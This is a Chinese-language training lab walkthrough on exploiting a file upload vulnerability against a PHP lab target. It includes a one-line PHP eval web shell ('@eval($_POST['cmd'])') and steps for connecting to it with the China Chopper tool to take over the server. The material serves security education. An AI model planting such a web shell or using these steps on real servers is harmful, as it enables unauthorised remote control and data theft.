声明
本次实验环境来源深信服产业教育平台
仅供学习交流使用,请勿用于非法用途,违者一律自行承担所有风险
实验目的
通过本实验,掌握文件上传的过程以及文件上传漏洞的利用,理解文件上传的利用条件和漏洞危害。
实验环境
操作机:Win10
靶机:Apache + PHP(192.168.21.8)
实验地址:http://ip/up/2/up.html
实验原理
上传文件时,如果未对上传的文件进行严格的验证和过滤,就容易造成文件上传漏洞,上传脚本文件(包括asp、aspx、jsp、php等)
造成文件上传漏洞的成因(比较复杂)有:
Web应用开放了文件上传功能,并且对上传的文件没有进行足够的限制
程序开发部署的时候,没有考虑到系统特性和过滤不严格
通过其他漏洞绕过限制
实验步骤
1、登录操作机,打开浏览器,输入实验地址:http://[靶机IP地址]/up/2/up.html
2、在操作机上准备要上传的文件(脚本文件),比如新建info.php文件
<?php
phpinfo();
?>
3、点击“选择文件”按钮,选中要上传的文件
4、点击“submit”按钮,上传info.php文件
5、输入http://ip/up/2/upload/info.php,访问上传的info.php脚本文件,查看脚本文件nfo.php文件可以成功上传并解析
6、在操作机上新建muma.php的一句话木马文件
<?php
@eval($_POST['cmd'])>
?>
7、上传一句话木马文件
8、打开桌面tools文件夹的“中国菜刀(过狗)”,双击exe文件
9、在空白处鼠标右击,点击“添加”,添加shell地址
地址为:一句话木马地址和连接密码
脚本类型:PHP
10、点击“添加”,双击一句话木马地址
11、浏览器服务器,对任意文件进行操作,可以上传、下载等,成功上传后门文件,服务器沦陷
实验总结
掌握文件上传的过程和文件上传漏洞的利用过程,利用文件上传漏洞上传木马脚本,通过WebShell工具连接后门,拿下网站服务器,理解文件上传的危害。